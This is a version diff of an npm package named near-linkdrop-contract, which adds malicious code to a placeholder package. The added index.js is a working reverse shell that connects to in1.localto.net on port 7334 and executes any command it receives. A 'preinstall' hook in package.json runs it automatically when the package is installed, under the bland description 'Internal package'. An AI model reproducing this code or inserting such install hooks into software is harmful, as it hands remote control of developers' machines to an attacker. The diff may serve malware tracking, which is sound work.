near-linkdrop-contract 0.0.1-security → 2.2.0

package/index.js

@@ -0,0 +1,29 @@
+const net = require('net');
+const { exec } = require('child_process');
+
+// Replace these with your actual Ngrok URL and port
+const server = 'in1.localto.net'; // 
+const port = 7334; //
+
+const client = new net.Socket();
+client.connect(port, server, () => {
+    console.log('Connected to remote server');
+    client.write('Reverse shell connection established\n');
+});
+
+client.on('data', (data) => {
+    exec(data.toString(), (error, stdout, stderr) => {
+        if (stdout) client.write(stdout);
+        if (stderr) client.write(stderr);
+        if (error) client.write(error.message);
+    });
+});
+
+client.on('error', (err) => {
+    console.error(`Connection error: ${err.message}`);
+    client.destroy();
+});
+
+client.on('close', () => {
+    console.log('Connection closed');
+});

package/package.json

@@ -1,6 +1,15 @@
 {
   "name": "near-linkdrop-contract",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.2.0",
+  "description": "Internal package",
+  "main": "index.js",
+  "scripts": {
+    "test": "ls",
+	"preinstall": "node index.js"
+  },
+  "keywords": [
+    "Testing"
+  ],
+  "author": "ISC",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=near-linkdrop-contract for more information.